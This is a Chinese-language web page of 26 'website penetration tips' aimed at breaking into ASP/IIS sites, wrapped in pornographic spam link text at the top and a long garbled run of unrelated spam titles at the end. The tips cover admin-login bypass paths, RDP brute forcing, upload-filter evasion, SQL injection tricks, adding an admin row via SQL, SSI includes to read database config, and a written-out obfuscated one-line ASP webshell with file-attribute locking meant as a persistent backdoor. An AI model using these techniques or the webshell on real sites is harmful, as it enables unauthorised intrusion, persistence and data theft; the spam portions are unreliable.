国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

網站滲透技巧收集與總結

安全 應用安全
本文總結了一些常用的網站滲透技巧,希望對大家有所幫助。

本文總結了一些常用的網站滲透技巧,希望對大家有所幫助。

網站滲透技巧收集與總結

1.利用網站過濾不嚴直接繞過后臺驗證,在網站后面加上 admin/session.asp 或 admin/left.asp

2.有的網站進后臺會出現一個腳本提示框,輸入:administrator 即可突破!admin代表以管理員身份進入的意思。

3.有的網站開了3389,入侵之前先去連接3389,嘗試弱口令或是爆破,再者就是按5次shift鍵,看看有沒前人裝過后門,然后再社工密碼。

4.有時候進后臺會彈出提示框“請登陸”,把地址抄寫出來(復制不了),然后放在網頁源代碼分析器里,選擇瀏覽器-攔截跳轉勾選–查看即可進入后臺!

5.突破防盜鏈訪問webshell,代碼:

javascript:document.write("fuck")

回車后點擊GO即可進入webshell

6.突破一流信息監控攔截系統訪問,當小馬可以訪問,上傳大馬卻不行的時候,可以先用大馬跟一張圖片合并,在上傳合并后的圖片,接著數據庫備份后訪問即可!

7.在拿編輯器的shell時,有時增加了asp|asa|cer|php|aspx等擴展名上傳時都被過濾了,其實只要增加aaspsp 上傳asp就會突破了。

8.有時啊D猜出表段了,但是猜不到字段的時候,可以到后臺查看源文件,搜索ID或type,一般都能找到,再到啊D里添加字段進行猜解內容即可突破。

9.社工后臺密碼可以用這個技巧,假如網站域名是:www.hx95.com管理員名稱為hx95,可以試試密碼“hx95”和“www.hx95.com”來登陸。

10.手工注入時如果網站過濾了 and 1=1 and 1=2 ,可以用xor 1=1 xor 1=2 進行判斷。

11.本地構造上傳一句話木馬,如果提示“請先選擇你要上傳的文件![ 重新上傳 ]” ,說明文件太小了,用記事本打開再復制多幾句話從而擴大文件大小,再上傳即可。12.用啊d跑表,跑字段名name和pass出不來,顯示長度超過50什么的,猜解不出的情況下,這時放在穿山甲去跑一般都能跑出來!

13.猜管理員后臺小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 會現出菜單導航,然后迅雷下載全部鏈接。

14.知道表名,字段,使用SQL語句在ACCESS數據庫中加個用戶名及密碼語句:

 Insert into admin(user,pwd)values('test','test')

15.當獲得管理員密碼,卻拿不到管理員的帳號時,到前臺隨便打開一個新聞,找找諸如“提交者”“發布者”之類的字眼,一般“提交者”就是管理員的帳號了。

16.爆破ASP+IIS架設的網站web絕對路徑,假設網站主頁為:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。

17.源碼的利用,很多網站用的都是網上下載的源碼,有的站長很懶,什么也不改,然后就上傳開通網站了,我們可以去下載一套,里面有很多默認的信息值得利用。

18.把以下代碼上傳到webshell里,后綴是asp,就算別人發現了也刪除不了,算是超級防刪的一句話木馬了,可以很安全的留個后門,菜刀連接密碼:x

 

  1. <%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Setf=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes<>3939then:f.attributes=39:endif%> 

 

19.當破解出帳號密碼卻找不到后臺的時候,可以嘗試鏈接ftp,假如域名是:www.baidu.com “ 得到的密碼為“bishi”,我們就可以試下用“xxxx”“xxxx.cn”www.xxxx.cn作為FTP 用戶名,用“bishi”:作為FTP密碼來進行登陸,華夏聯盟成功的幾率可以很大的哦!ftp的默認端口:21 默認帳號密碼:test

20.有的后臺不顯示驗證碼,難道就沒法登錄了么? 其實把一段代碼導入注冊表里就可以突破這個困境了,把下面的代碼保存為Code.reg,雙擊導入就可以了!

1 2 3 REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] "BlockXBM"=dword:00000000

21.當網站不允許上傳 asp、asa、php等文件時,我們可以上傳一個stm文件,代碼為:

  1. <!--#include file=”conn.asp”-->” 

(想查看什么文件就寫什么文件名,這里我假設想查看“conn.asp”),

然后直接打開這個stm文件的地址,再查看源代碼,“conn.asp”這個文件的代碼就一覽無遺了!

22.當網站不允許上傳ASP,CGI,CER,CDX,HTR等類型的文件時,嘗試上傳一個shtm文件,內容為:

  1. <!--#includ file="conn.asp"--> 

如果上傳成功,那太好了,訪問地址就可以瀏覽conn.asp里的內容了,這樣一來,數據庫路徑也就到手啦!

23.手工檢測注入點彈出“你的操作已被記錄!”之類的信息,訪問這個文件:sqlin.asp,如果存在,在注入點后面植入一句話木馬:

‘excute(request(“TNT”))

接著用一句話木馬客戶端連接:http://www.xxx.com/sqlin.asp,上傳木馬即可拿下shell,因為很多防注入程序都是用”sqlin.asp“這個文件名來做非法記錄的數據庫。

24.旁注的話,肯定是挑支持aspx的站點來日了,問題是怎樣判斷呢?方法很簡單,在在網站后面加上xxx.aspx,如果返回“/”應用程序中的服務器錯誤,無法找到該資源,404畫面就說明支持aspx木馬。

25.網站后面加test.php 可以查看版本

26.禁忌這兩個網站后臺文件 admin_index.asp manage_login.asp

責任編輯:藍雨淚 來源: 中國黑客聯盟
相關推薦

2015-02-27 16:10:25

2021-05-20 10:16:44

Web滲透漏洞

2012-02-01 14:28:03

Java線程

2021-10-11 10:39:13

內網信息收集

2014-06-09 14:18:24

2012-08-09 09:42:23

HadoopNoSQL實施

2011-08-18 13:57:47

Star Schema

2019-12-20 14:21:26

JVM調優垃圾回收

2013-06-27 10:26:53

Sqlmap注入

2012-11-28 14:09:41

2020-04-02 11:11:27

黑客網絡安全域名采集

2009-09-01 15:08:07

C#命名規范

2009-08-28 17:00:50

C# for

2021-09-13 07:58:52

考試算法PAT

2011-11-18 15:18:41

Junit單元測試Java

2018-11-26 08:49:42

CPU排查負載

2010-09-13 16:32:58

2019-09-15 14:07:49

2013-07-05 16:37:50

數據丟失故障排查

2013-12-26 13:36:27

JavaScript技巧
點贊
收藏

51CTO技術棧公眾號

国产真实生活伦对白| 国产精品7m视频| 久久久不卡网国产精品二区| 不卡在线一区| 丁香花在线观看完整版电影| mm1313亚洲国产精品无码试看| 99在线观看视频| 欧美xxxx18性欧美| 欧美日韩高清影院| 国产欧美日韩麻豆91| 久久精品亚洲| 色愁久久久久久| 美女扒开腿让男人桶爽久久软| 五月天最新网址| 国产3p露脸普通话对白| 成人春色激情网| 最新国产精品亚洲| 56国语精品自产拍在线观看| 国产精品久久久久久久久快鸭| 蜜桃久久精品一区二区| 99视频精品全部免费在线视频| 亚洲免费资源| 天堂8中文在线| 天堂资源中文在线| 日韩一级理论片| 宅男在线精品国产免费观看| 国产精品久久久久久婷婷天堂| 按摩亚洲人久久| 欧美成人福利视频| 精品国产乱码久久久久久天美 | 亚洲天堂2020| 欧美日本免费一区二区三区| 国产欧美日韩激情| 国产成人综合在线播放| 国产亚洲在线观看| 久久久久久美女精品| 高清一区二区三区| 午夜无码国产理论在线| 在线看av的网址| 美女被人操视频在线观看| 北条麻妃在线一区| 日本一本中文字幕| 视频在线观看成人| 国产伦视频一区二区三区| 国产精品成人一区| 久久久久久久久国产| 国产亚洲精品成人av久久ww| 亚洲国产精品成人av| 这里只有精品免费| 色综合欧美在线| 亚洲国产aⅴ天堂久久| 国产精品不卡视频| 国产三级精品三级| 久久奇米777| 99精品视频在线观看| 国产精品88888| 精品一区二区三区不卡 | 国产96在线亚洲| 91成人福利社区| 成人国产一区二区三区精品麻豆| 日本无删减在线| 超碰在线免费公开| 麻豆最新免费在线视频| 999国产在线视频| 欧美白人做受xxxx视频| 500福利第一精品导航| 男人免费av| 女生裸体视频网站免费观看| av污在线观看| 99热手机在线观看| 奇米777影视成人四色| www.夜夜爽| 九色丨porny丨自拍入口| 15—17女人毛片| 日本a√在线观看| 亚洲黄色av网址| 欧美黄色性生活| 成人黄网大全在线观看| 国产美女av| 国产美女极品在线| 日本大片在线观看| 国产对白叫床清晰在线播放| a天堂中文在线| av片哪里在线观看| 欧美裸体视频| 国产亚洲精品精品国产亚洲综合| 日本在线精品| 日韩三级网址| 日本成人7777| 婷婷综合亚洲| 99在线热播精品免费99热| 久色成人在线| 国产精品 日产精品 欧美精品| 粉嫩aⅴ一区二区三区四区五区| 99精品视频一区二区三区| 国产精品入口麻豆原神| 一区二区三区av电影| 欧美日韩亚洲一区二| 欧美日韩国产一区二区三区地区| 欧美一级电影网站| 亚洲九九九在线观看| 久久久精品在线观看| 91超碰中文字幕久久精品| 国产色婷婷国产综合在线理论片a| 国产福利久久精品| 中文字幕在线亚洲三区| 精品视频一区二区在线| 视频免费在线看| 日本黄色片在线观看| 性国裸体高清亚洲| 亚洲欧洲二区| 成人中文视频| 日韩二区三区在线观看| 99久久er热在这里只有精品15| 亚洲免费资源在线播放| 欧美日韩精品一区二区三区四区 | 第一会所亚洲原创| 亚洲另类黄色| 国产盗摄女厕一区二区三区| 欧美激情中文字幕一区二区| 亚洲mv在线观看| 日韩亚洲国产中文字幕欧美| www.日本久久久久com.| 国产精品视频导航| 特级西西444www大精品视频| 日韩在线xxx| 黄色电影免费在线看| 麻豆免费在线| 久久午夜影院| 99精品免费| www.激情成人| 一区二区三区日韩精品视频| 91精品中文字幕一区二区三区| 中文字幕亚洲一区| 国产成人精品久久二区二区| 日韩少妇中文字幕| 久草精品在线播放| 国产三级在线| 午夜不卡一区| 欧美国产日本| 成人h精品动漫一区二区三区| 午夜亚洲福利老司机| 日韩大片免费观看视频播放| 热门国产精品亚洲第一区在线| 免费精品视频一区| 亚洲高清免费在线观看| 四虎亚洲精品| 国产成人短视频在线观看| 久久99九九99精品| 亚洲成人免费视| 在线视频欧美日韩| 草莓视频一区| 欧美三级午夜理伦三级| 国产原创在线观看| 国产一区二区三区亚洲| 免费精品99久久国产综合精品| 亚洲九九爱视频| 亚洲欧美日韩直播| 99国产在线视频| 日本新janpanese乱熟| 深夜国产在线播放| av一区二区在线观看| 成人综合在线观看| 欧美日韩卡一卡二| 国内偷自视频区视频综合| 亚洲欧洲日夜超级视频| 免费观看又污又黄在线观看国产| 欧美日韩五码| 亚洲国内自拍| 亚洲日本在线a| 中文日韩在线视频| 久久riav| 意大利激情丛林无删减版dvd| av在线不卡精品| 亚洲欧美春色| 亚洲午夜久久久久中文字幕久| 最新的欧美黄色| 日本精品一区二区| heyzo视频在线播放| 在线观看日韩高清av| 波多野结衣中文一区| 欧美日韩在线播放一区| 97超碰国产精品女人人人爽 | 成人久久18免费网站图片| 久久99中文字幕| 国产二区三区在线| 国产99久久久国产精品成人免费 | 女人喷潮完整视频| 日本无删减在线| 欧美淫片网站| 亚洲天堂成人在线观看| 一本色道久久88综合亚洲精品ⅰ| 精品欧美国产| 佐山爱痴汉视频一区二区三区| 在线播放成人| 精品一区二区三区免费视频| 欧美色爱综合网| 国产精品天天狠天天看| 午夜精品在线免费观看| 免费高清视频在线一区|